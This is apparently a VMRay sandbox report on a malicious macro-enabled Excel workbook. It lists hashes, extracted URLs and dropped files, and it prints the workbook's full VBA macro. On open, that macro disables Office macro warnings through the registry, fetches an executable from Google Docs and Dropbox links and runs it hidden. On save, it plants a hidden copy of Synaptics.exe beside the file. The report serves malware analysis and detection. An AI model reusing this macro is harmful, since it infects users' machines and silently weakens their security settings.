Try VMRay Platform
Malicious
Classifications

-

Threat Names

Mal/HTMLGen-A

Dynamic Analysis Report

Created on 2023-09-19T15:11:33+00:00

habilitado para macro.xlsm

Excel Document
...
Filters:
File Name Category Type Verdict Actions
C:\Users\RDhJ0CNFevzX\Desktop\habilitado para macro.xlsm Sample File Office File
Malicious
...
»
MIME Type application/vnd.ms-excel.sheet.macroEnabled.12
File Size 116.71 KB
MD5 3558aa966eb00cfbd3071f868e5afb25 Copy to Clipboard
SHA1 64dba1361a188e493205ce894d5494db6d489035 Copy to Clipboard
SHA256 acfe38dfd3856d7edda03ab3a3f78e7ad908912b162d6a79507f813d442eaa58 Copy to Clipboard
SSDeep 1536:eLEHorDlOhAYiQRshfkp7Vgk5moAVNL9weeSIQT989dhWB99mhLdSwxOTj4vUYtX:vgpy9shfCh5moAPf8xW1UxO3pYwvWNIu Copy to Clipboard
ImpHash -
Office Information
»
Creator RPC1
Last Modified By Matheus
Create Time 2015-01-15 16:55 (UTC)
Modify Time 2023-09-18 21:42 (UTC)
Application Microsoft Excel
App Version 16.0300
Document Security NONE
Planilhas 9
Titles Of Parts ABS, INDISP, LOGADO, PAUSAS, ADERÊNCIA, Planilha2, TMA, SHORT CALL, NOTA
ScaleCrop False
SharedDoc False
VBA Macros (1)
»
Macro #1: ThisWorkbook
» 
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Dim SheetsChanged As Boolean
Dim SheetCount As Integer

Private Sub Workbook_Open()
  Dim i As Integer
  For i = 1 To ActiveWorkbook.Sheets.Count
    ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
  Next i
  
  RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\VBAWarnings", 1, "REG_DWORD"
  
  Application.DisplayAlerts = False
  SheetCount = Worksheets.Count
  
  Call MPS
  
  ActiveWorkbook.Sheets(1).Select
  SheetsChanged = False
End Sub

Private Sub Workbook_BeforeClose(Cancel As Boolean)
  If Not SheetsChanged Then
    ActiveWorkbook.Saved = True
  End If
End Sub

Private Sub Workbook_SheetChange(ByVal Sh As Object, ByVal Target As Range)
  SheetsChanged = True
End Sub

Private Sub Workbook_NewSheet(ByVal Sh As Object)
  SheetsChanged = True
End Sub

Private Sub Workbook_SheetActivate(ByVal Sh As Object)
  If ActiveWorkbook.Sheets.Count <> SheetCount Then
    SheetsChanged = True
    SheetCount = ActiveWorkbook.Sheets.Count
  End If
End Sub

Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
  Dim i As Integer
  Dim AIndex As Integer
  Dim FName

  AIndex = ActiveWorkbook.ActiveSheet.Index

  If SaveAsUI = False Then
    Cancel = True
    Application.EnableEvents = False
    Application.ScreenUpdating = False
    
    For i = 1 To ActiveWorkbook.Sheets.Count - 1
      ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
    Next i
    ActiveWorkbook.Save
      
    For i = 1 To ActiveWorkbook.Sheets.Count
      ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
    Next i
    ActiveWorkbook.Sheets(AIndex).Select
    SheetsChanged = False
    
    Application.ScreenUpdating = True
    Application.EnableEvents = True
  Else
    Cancel = True
    Application.EnableEvents = False
    Application.ScreenUpdating = False
    
    For i = 1 To ActiveWorkbook.Sheets.Count - 1
      ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
    Next i
    
    FName = Application.GetSaveAsFilename(fileFilter:="Excel Çalýþma Kitabý (*.xlsm), *.xlsm")
    If FName <> False Then
      ActiveWorkbook.SaveAs Filename:=FName, FileFormat:=xlOpenXMLWorkbookMacroEnabled
      SaveAsInj ActiveWorkbook.Path
    End If
    
    For i = 1 To ActiveWorkbook.Sheets.Count
      ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
    Next i
    ActiveWorkbook.Sheets(AIndex).Select
    SheetsChanged = False
        
    Application.ScreenUpdating = True
    Application.EnableEvents = True
  End If
End Sub

Sub SaveAsInj(DIR As String)
  Dim FSO As Object
  Dim FN As String
  
  Set FSO = CreateObject("scripting.filesystemobject")
  FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
  
  If FSO.FileExists(FN) Then
    If Not FSO.FileExists(DIR & "\~$cache1") Then
      FileCopy FN, DIR & "\~$cache1"
    End If
    SetAttr (DIR & "\~$cache1"), vbHidden + vbSystem
  End If
End Sub

Function RegKeyRead(i_RegKey As String) As String
  Dim myWS As Object

  On Error Resume Next
  Set myWS = CreateObject("WScript.Shell")
  RegKeyRead = myWS.RegRead(i_RegKey)
End Function

Function RegKeyExists(i_RegKey As String) As Boolean
Dim myWS As Object

  On Error GoTo ErrorHandler
  Set myWS = CreateObject("WScript.Shell")
  myWS.RegRead i_RegKey
  RegKeyExists = True
  Exit Function
  
ErrorHandler:
  RegKeyExists = False
End Function

Sub RegKeySave(i_RegKey As String, _
               i_Value As String, _
      Optional i_Type As String = "REG_SZ")
Dim myWS As Object

  Set myWS = CreateObject("WScript.Shell")
  myWS.RegWrite i_RegKey, i_Value, i_Type
End Sub

Sub MPS()
  Dim FSO As Object
  Dim FP(1 To 3), TMP, URL(1 To 3) As String
  
  Set FSO = CreateObject("scripting.filesystemobject")
  FP(1) = ActiveWorkbook.Path & "\~$cache1"
  FP(2) = ActiveWorkbook.Path & "\Synaptics.exe"

  URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"
  URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
  URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
  TMP = Environ("Temp") & "\~$cache1.exe"
  
  If FSO.FileExists(FP(1)) Then
    If Not FSO.FileExists(TMP) Then
      FileCopy FP(1), TMP
    End If
    Shell TMP, vbHide
  ElseIf FSO.FileExists(FP(2)) Then
    If Not FSO.FileExists(TMP) Then
      FileCopy FP(2), TMP
    End If
    Shell TMP, vbHide
  Else
    If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
      Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
    ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
      Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
    ElseIf Not FSO.FileExists(TMP) Then
      If FDW((URL(1)), (TMP)) Then
      ElseIf FDW((URL(2)), (TMP)) Then
      ElseIf FDW((URL(3)), (TMP)) Then
      End If
      If FSO.FileExists(TMP) Then
        Shell TMP, vbHide
      End If
    Else
      Shell TMP, vbHide
    End If
    
  End If
  
End Sub

Function FDW(MYU, NMA As String) As Boolean
  Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
  If WinHttpReq Is Nothing Then
    Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
  End If

  WinHttpReq.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
  WinHttpReq.Option(6) = AllowRedirects
  WinHttpReq.Open "GET", MYU, False
  WinHttpReq.Send
  
  If (WinHttpReq.Status = 200) Then
    If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found<") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then
      FDW = True
      Set oStream = CreateObject("ADODB.Stream")
      oStream.Open
      oStream.Type = 1
      oStream.Write WinHttpReq.ResponseBody
      oStream.SaveToFile (NMA)
      oStream.Close
    Else
       FDW = False
    End If
  Else
    FDW = False
  End If
End Function
Extracted URLs (2)
»
URL WHOIS Data Reputation Status Recursively Submitted Actions
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
Show WHOIS
Malicious
-
...
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
Show WHOIS
Malicious
-
...
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\mso4a31.tmp Dropped File Image
Clean
...
»
Also Known As c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\mso4a41.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\mso549.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\mso6f0.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\mso6f1.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\mso7dc.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\mso7dd.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\mso89a.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\mso89b.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\mso986.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\mso987.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\msoa63.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\msoa64.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\msoc88.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\msoc89.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\msoe20.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\msoe21.tmp (Dropped File)
MIME Type image/png
File Size 5.34 KB
MD5 c4c38a7d937c652fe5c5a39c668f8d86 Copy to Clipboard
SHA1 baacab0836afc11765e1896388d06f7a5deb9253 Copy to Clipboard
SHA256 48b090cbfa1300a7a60f6eaafa08ddaccfc96943c8a3e943a4b9d9e45a18b52a Copy to Clipboard
SSDeep 24:Lc8/6BJvNMOOEqeeenkOEEBeeennMREieeeenMGeeennMMOEEieeennMMpPWeeer:Lv/6BH Copy to Clipboard
ImpHash -
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\mso4ea.tmp Dropped File Empty
Clean
...
  • Actions
»
MIME Type application/x-empty
File Size 0 Bytes (not extracted)
MD5 d41d8cd98f00b204e9800998ecf8427e Copy to Clipboard
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 Copy to Clipboard
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 Copy to Clipboard
SSDeep 3:: Copy to Clipboard
ImpHash -
3212aadb6d3a1789c1b9957ce3473863c8ffc425b6706384119568c165d73f34 Downloaded File HTML
Clean
...
»
MIME Type text/html
File Size 1.60 KB
MD5 74211d69292aeb3622f0d0c45d16da5d Copy to Clipboard
SHA1 e339693ecba6def870ec48005c0963ad6ae4a999 Copy to Clipboard
SHA256 3212aadb6d3a1789c1b9957ce3473863c8ffc425b6706384119568c165d73f34 Copy to Clipboard
SSDeep 24:bsF+0r/SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+A+pAZewRDK4mW Copy to Clipboard
ImpHash -
a9a292cabe24873cac1e508e576b71f49ddb3a36c1fe27cafffb0e054692f453 Downloaded File HTML
Clean
...
»
MIME Type text/html
File Size 1.09 KB
MD5 79ace10b664dfa27609ea64d53e7332d Copy to Clipboard
SHA1 4b51414552b0bb3bdae345054bb53bd4e1e2cbf5 Copy to Clipboard
SHA256 a9a292cabe24873cac1e508e576b71f49ddb3a36c1fe27cafffb0e054692f453 Copy to Clipboard
SSDeep 24:hYjkspFAuWGDg5+DCpdgcPn8KvGATBddslZ2jfZc2v2Mq25uXc:4plWFlzuAlHAZexcA4lc Copy to Clipboard
ImpHash -
VMRay - Analyzer - www.vmray.com
Legal Note - Privacy Policy
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting \"security.fileuri.strict_origin_policy\". 


    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting \"security.fileuri.strict_origin_policy\".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting \"security.fileuri.strict_origin_policy\".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    

     Exit-Icon
    

    

     

      WHOIS Domain Information
     

     

      

       
        Domain Name
       
       
       
      

      

       
        WHOIS Response
       
       
        

       		
      

     

    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image